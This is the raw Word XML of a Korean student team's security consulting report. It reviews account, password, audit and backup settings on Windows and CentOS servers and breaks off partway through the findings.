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68" w:rsidRPr="00865A68" w:rsidRDefault="00865A68" w:rsidP="00865A6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65A68" w:rsidRDefault="00865A68" w:rsidP="00865A68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</w:pPr>
      <w:r w:rsidRPr="00865A68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보안</w:t>
      </w:r>
      <w:r w:rsidRPr="00865A68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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00865A68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컨설팅</w:t>
      </w:r>
      <w:r w:rsidRPr="00865A68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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00865A68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프로젝트</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00865A68" w:rsidRPr="00865A68" w:rsidRDefault="00865A68" w:rsidP="00865A68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40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0040771B" w:rsidRDefault="00865A68" w:rsidP="00865A68">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3조 </w:t>
      </w:r>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>김동은,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>곽준희,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>유승호</w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00865A68" w:rsidRDefault="00865A68" w:rsidP="00865A68">
      <w:pPr>
        <w:ind w:right="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00865A68" w:rsidRPr="00865A68" w:rsidRDefault="00865A68" w:rsidP="00865A68">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:right="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00865A68">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>개요</w:t>
      </w:r>
      <w:r w:rsidRPr="00865A68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[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>컨설팅 회사 소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직 현황</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00865A68" w:rsidRDefault="00865A68" w:rsidP="00865A68">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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사 소개 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00865A68" w:rsidRDefault="00865A68" w:rsidP="00865A68">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1160" w:right="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00865A68" w:rsidRDefault="00865A68" w:rsidP="00865A68">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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직 현황 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00865A68" w:rsidRDefault="00865A68" w:rsidP="00865A68">
      <w:pPr>
        <w:ind w:left="1160" w:right="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00865A68" w:rsidRDefault="00865A68" w:rsidP="00865A68">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:right="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00865A68">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>보안 취약점 점검</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00865A68" w:rsidRDefault="00865A68" w:rsidP="00865A68">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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보안 요구사항</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00865A68" w:rsidRDefault="00865A68" w:rsidP="00865A68">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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취약점 점검 리스트</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00865A68" w:rsidRDefault="00865A68" w:rsidP="00865A68">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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취약점 점검 일정</w:t>
      </w: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Default="00CE3782" w:rsidP="00CE3782">
      <w:pPr>
        <w:ind w:right="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRPr="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782">
      <w:pPr>
        <w:ind w:right="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00865A68" w:rsidRDefault="00865A68" w:rsidP="00865A68">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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점검 결과</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRPr="00CE3782" w:rsidRDefault="00865A68" w:rsidP="00CE3782">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:right="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>보안 점검</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRPr="00CE3782" w:rsidRDefault="00865A68" w:rsidP="00CE3782">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:right="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">계정 정책 </w:t>
      </w:r>
      <w:r w:rsidR="00CE3782" w:rsidRPr="00CE3782">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>암호 정책 및 계정 잠금 정책</w:t>
      </w:r>
      <w:r w:rsidR="00CE3782" w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00865A68" w:rsidRDefault="00865A68" w:rsidP="00865A68">
      <w:pPr>
        <w:ind w:right="200" w:firstLine="800"/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034540" cy="624840"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="2" name="그림 2" descr="https://lh6.googleusercontent.com/I7hapM_E5_x7j1vWZRfhrGhRDnqhZJoRBkTKPwplH_8wR0wlevKc5U87M6D437pXUitaRybJNLuUwQ8BFoiKBX9HhqHIyN2q68i-yFOU8L_UQE7n2V2JZCBOP_hRy-3SFOBVY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7hapM_E5_x7j1vWZRfhrGhRDnqhZJoRBkTKPwplH_8wR0wlevKc5U87M6D437pXUitaRybJNLuUwQ8BFoiKBX9HhqHIyN2q68i-yFOU8L_UQE7n2V2JZCBOP_hRy-3SFOBVYh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A68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70760" cy="411480"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="3" name="그림 3" descr="https://lh4.googleusercontent.com/Hg6vLIepMSQFn5U_oh0fXB7s6WVjiA67on_aEuehjXGwE5ZWOWa-PrqMTAYctEJrQO0e89lWlDaXM8r54UimntdPn6d7o5TG_xT6I3OKOjeNG1kazZYGZc-rcjmSDbEUZBmB5R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g6vLIepMSQFn5U_oh0fXB7s6WVjiA67on_aEuehjXGwE5ZWOWa-PrqMTAYctEJrQO0e89lWlDaXM8r54UimntdPn6d7o5TG_xT6I3OKOjeNG1kazZYGZc-rcjmSDbEUZBmB5Rl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A68" w:rsidRDefault="00865A68" w:rsidP="00865A68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8640</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3810</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2766060" cy="1021080"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="4" name="그림 4" descr="https://lh4.googleusercontent.com/r7BD5MSKDSJwkOl0fhbrJFzFmtAomL5VTvJF3TW-dZ0xkrZ_SiU2ca6F0dMHFIJMdJ2cNQdiU3CGijSrFoUtOHT2DbXdHB-fTsnTOgTZwVCI7WI7Ca3tEiYaWT3E3KMcjWORmX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r7BD5MSKDSJwkOl0fhbrJFzFmtAomL5VTvJF3TW-dZ0xkrZ_SiU2ca6F0dMHFIJMdJ2cNQdiU3CGijSrFoUtOHT2DbXdHB-fTsnTOgTZwVCI7WI7Ca3tEiYaWT3E3KMcjWORmX9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1447800" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="그림 5" descr="https://lh4.googleusercontent.com/XbFNQZ_b76P-_J2DAfulAMqb7dFZ_mW01yUYfXVN2dpfE6cdy2aWA1p3Btkno5CvU2B8QGlJ6vq5CDSu1xSc0tOifGcaC_w3dyFKHjLMG9F2hjq-SjO0heK7GPlaTGnk-pGMHK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XbFNQZ_b76P-_J2DAfulAMqb7dFZ_mW01yUYfXVN2dpfE6cdy2aWA1p3Btkno5CvU2B8QGlJ6vq5CDSu1xSc0tOifGcaC_w3dyFKHjLMG9F2hjq-SjO0heK7GPlaTGnk-pGMHK5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82" w:rsidRPr="00CE3782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>윈도우</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> OS </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버의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경우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복잡성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정책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최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기억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음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최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기간</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 42</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>일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최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길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제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음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최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기간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제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음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잠금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기간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및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임계</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia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값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음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00865A68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 xml:space="preserve">CentOS </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버의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경우</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/pam.d/system-auth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복잡도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재시도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가능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횟수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최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최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길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기본값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만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경고</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia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일은</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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전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암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최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길이는</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, /etc/default/useradd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결과</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> INACTIVE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의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값이</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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잠금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되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있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  <w:r w:rsidR="00865A68" w:rsidRPr="00CE3782">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRPr="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782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CE3782">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">계정 정책 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>계정 설정]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782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38400" cy="1135380"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="6" name="그림 6" descr="https://lh6.googleusercontent.com/awAcytYQNoT0R8ekGYMduPnCus7yGL3l-Hw-W8rIduOq9qpkLUMZzGLxatGkE8hDzqaW5118APTU_-5jZs4fZU736DOXqNRK4eUSrtpxHVB-PKtUafLOiZ93Zium-ilKygscYW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awAcytYQNoT0R8ekGYMduPnCus7yGL3l-Hw-W8rIduOq9qpkLUMZzGLxatGkE8hDzqaW5118APTU_-5jZs4fZU736DOXqNRK4eUSrtpxHVB-PKtUafLOiZ93Zium-ilKygscYWT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782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02180" cy="1905000"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="7" name="그림 7" descr="https://lh6.googleusercontent.com/n6AbGRr0IC773o7Mvcx-e9Yx8QUo5SrePfiFpt3Nxn5E8pKHF6VXkOxMj9oOYqPXpIdRn0yo_v2eHN1MvdliTIsvt1-VvDgSCpGLEmWp0hU1lNgeswF6VjdFDVGHf2Iarl2uI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n6AbGRr0IC773o7Mvcx-e9Yx8QUo5SrePfiFpt3Nxn5E8pKHF6VXkOxMj9oOYqPXpIdRn0yo_v2eHN1MvdliTIsvt1-VvDgSCpGLEmWp0hU1lNgeswF6VjdFDVGHf2Iarl2uI2d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82" w:rsidRPr="00CE3782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>윈도우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서버는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관리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및</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Guest </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>계정</w:t>
      </w:r>
      <w:r w:rsidR="00220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia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명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그대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</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, Guest </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>계정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안</w:t>
      </w:r>
      <w:r w:rsidR="00220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia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함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상태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 w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>원격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접속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필요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별도의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계정을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하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CE3782" w:rsidRPr="00CE3782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 xml:space="preserve">CentOS </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/passwd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root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이외에</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> user1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>계정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존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자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따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구분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보이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CE3782" w:rsidRPr="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782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CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>감사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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>정책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/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>개체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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>액세스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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>및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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>이벤트</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>감사</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782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39340" cy="1760220"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="8" name="그림 8" descr="https://lh5.googleusercontent.com/SJKVfxx8wI1GqqWDblwTd6BaaEM_x65pmY-rO2ddJT8ujgB1PsTscuSDwremBNCE1KF7cGJJas01Zrxd7wgyvHPGzhXIITgmQQdGi3ehA5ef-Z7_qsRYPliAMCRkkl9nQa5QY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SJKVfxx8wI1GqqWDblwTd6BaaEM_x65pmY-rO2ddJT8ujgB1PsTscuSDwremBNCE1KF7cGJJas01Zrxd7wgyvHPGzhXIITgmQQdGi3ehA5ef-Z7_qsRYPliAMCRkkl9nQa5QYoL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782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BBAEA30" wp14:editId="5CB7057C">
            <wp:extent cx="2575560" cy="1729740"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="10" name="그림 10" descr="https://lh4.googleusercontent.com/cfcOCFIEl78VJXhiWNO5QPR6uLHwQljBvcaJlAlS01Cn3NdM3DHICTpfYI-JbVYihdwApzJDkTUaQ_OMld8MSMP04qE025bCmO2IGpo6g_WAhPviiuMpnAk5xdxoSxHbfNwNUF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cfcOCFIEl78VJXhiWNO5QPR6uLHwQljBvcaJlAlS01Cn3NdM3DHICTpfYI-JbVYihdwApzJDkTUaQ_OMld8MSMP04qE025bCmO2IGpo6g_WAhPviiuMpnAk5xdxoSxHbfNwNUFw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82" w:rsidRPr="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>현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설정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감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정책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없음</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inux</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE3782">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의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로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경로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</w:p>
    <w:p w:rsidR="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782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CE3782">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>백업 일정 설정 및 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3782" w:rsidRDefault="00CE3782" w:rsidP="00CE3782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07920" cy="1577340"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="11" name="그림 11" descr="https://lh5.googleusercontent.com/uf20lk31lki7oCiDR42FA8KYldk6Cy_sT7MUB80iNg296FqAygoBAaAfTfwm7wNP9ezibTQhILPPR9Q1M6Y8i2eCxEQ318YeXRRkPDhL8Nz0e0E2RjHi-SZb7OIU8835e8DCko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uf20lk31lki7oCiDR42FA8KYldk6Cy_sT7MUB80iNg296FqAygoBAaAfTfwm7wNP9ezibTQhILPPR9Q1M6Y8i2eCxEQ318YeXRRkPDhL8Nz0e0E2RjHi-SZb7OIU8835e8DCko0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782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07920" cy="1562100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="그림 12" descr="https://lh6.googleusercontent.com/gXJ2qi3tm_hzl_aPIB97ZlyKxMYA9tgGlzSQVp1GYEJNy4brjSAVz4JK9j7i-fvbNQnVVyycXtTkx5hXcKpoECCL2EvbieQUpcw-mP6rICVOCHY5vfAVbkF6cCuxbYB6Evguk2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gXJ2qi3tm_hzl_aPIB97ZlyKxMYA9tgGlzSQVp1GYEJNy4brjSAVz4JK9j7i-fvbNQnVVyycXtTkx5hXcKpoECCL2EvbieQUpcw-mP6rICVOCHY5vfAVbkF6cCuxbYB6Evguk2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82" w:rsidRPr="00220989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220989">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>설정된</w:t>
      </w:r>
      <w:r w:rsidRPr="00220989">
        <w:rPr>
